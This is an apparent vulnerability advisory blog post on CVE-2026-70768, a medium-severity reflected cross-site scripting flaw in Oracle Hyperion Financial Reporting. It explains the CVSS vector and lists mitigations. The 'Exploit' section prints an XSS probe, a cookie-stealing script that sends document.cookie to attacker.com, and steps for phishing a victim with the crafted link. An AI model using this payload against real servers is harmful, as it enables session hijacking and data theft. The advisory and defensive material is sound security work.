Oracle Hyperion Financial Reporting, Cross-Site Scripting (XSS), CVE-2026-70768 (Medium) -DC-Aug2026-1823

Listen to this Post

CVE-2026-70768 is a vulnerability identified in the Oracle Hyperion Financial Reporting product, specifically within its Server component. The affected version is 11.2.25.0.000. This flaw is classified as easily exploitable, allowing an unauthenticated attacker with network access via HTTP to compromise the system. However, successful exploitation requires human interaction from a person other than the attacker, meaning a user must be tricked into performing an action, such as clicking a malicious link.
The vulnerability exists in how the Financial Reporting server handles certain HTTP requests. An attacker can craft a malicious request that, when processed by the server, triggers improper validation of user-supplied input. This results in a Cross-Site Scripting (XSS) condition where arbitrary JavaScript code can be injected into the response sent to the victim’s browser. The injected script executes within the context of the victim’s session, allowing the attacker to steal session cookies, capture keystrokes, or perform unauthorized actions on behalf of the user.
The vulnerability is not limited to a single product; attacks may significantly impact additional products (scope change). This scope change indicates that the injected script can traverse beyond the Financial Reporting application, potentially affecting other Oracle Hyperion components or integrated systems. Successful exploitation can result in unauthorized update, insert, or delete access to some Financial Reporting accessible data, as well as unauthorized read access to a subset of that data.
The CVSS 3.1 Base Score is 6.1, categorized as Medium severity. The vector string is CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. This indicates the attack is network-based (AV:N), has low complexity (AC:L), requires no privileges (PR:N), but does require user interaction (UI:R). The scope is changed (S:C), meaning a vulnerability in one component impacts resources in other components. The impact on confidentiality and integrity is low (C:L/I:L), with no availability impact (A:N). The NVD published this CVE on August 18, 2026, and it was last modified on August 24, 2026.

DailyCVE Form:

Platform: Oracle Hyperion
Version: 11.2.25.0.000
Vulnerability: Cross-Site Scripting
Severity: Medium (6.1)
date: 2026-08-18

Prediction: October 2026 CPU

What Undercode Say:

Analytics under this heading show the following bash commands and codes related to the blog

Check Oracle Hyperion Financial Reporting version
curl -s http://target-hyperion:port/version | grep "11.2.25.0.000"
Identify vulnerable endpoints (example)
curl -I http://target-hyperion:port/FinancialReporting/ endpoint
Basic reconnaissance for XSS
curl "http://target-hyperion:port/FinancialReporting/report?param=<script>alert(1)</script>"

Exploit: (Educational Purposes!)

The following steps demonstrate the exploitation concept for educational purposes only:
1. Identify a parameter in the Financial Reporting application that reflects user input without proper sanitization.

2. Craft a payload such as:

<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>

3. Encode the payload and inject it into the vulnerable parameter.
4. Deliver the malicious link to a legitimate user via email or social engineering.
5. Upon clicking, the user’s browser executes the script, sending session cookies to the attacker’s server.
6. The attacker can then impersonate the user and perform unauthorized data modifications or read sensitive information.

Protection:

  • Apply the upcoming Oracle Critical Patch Update (CPU) scheduled for October 2026, which is expected to include a fix for this vulnerability.
  • Implement input validation and output encoding on all user-supplied data within the Financial Reporting server.
  • Deploy a Web Application Firewall (WAF) to filter XSS payloads.
  • Educate users about the risks of clicking on untrusted links.
  • Restrict network access to the Financial Reporting server to trusted IP ranges.

Impact:

Successful exploitation allows an attacker to read and modify a subset of Oracle Hyperion Financial Reporting data. The scope change means other Hyperion products or integrated systems may also be affected. With a CVSS score of 6.1 (Medium), this vulnerability poses a moderate risk, primarily impacting confidentiality and integrity. The requirement for user interaction reduces the likelihood of automated mass exploitation, but targeted attacks remain a significant concern.
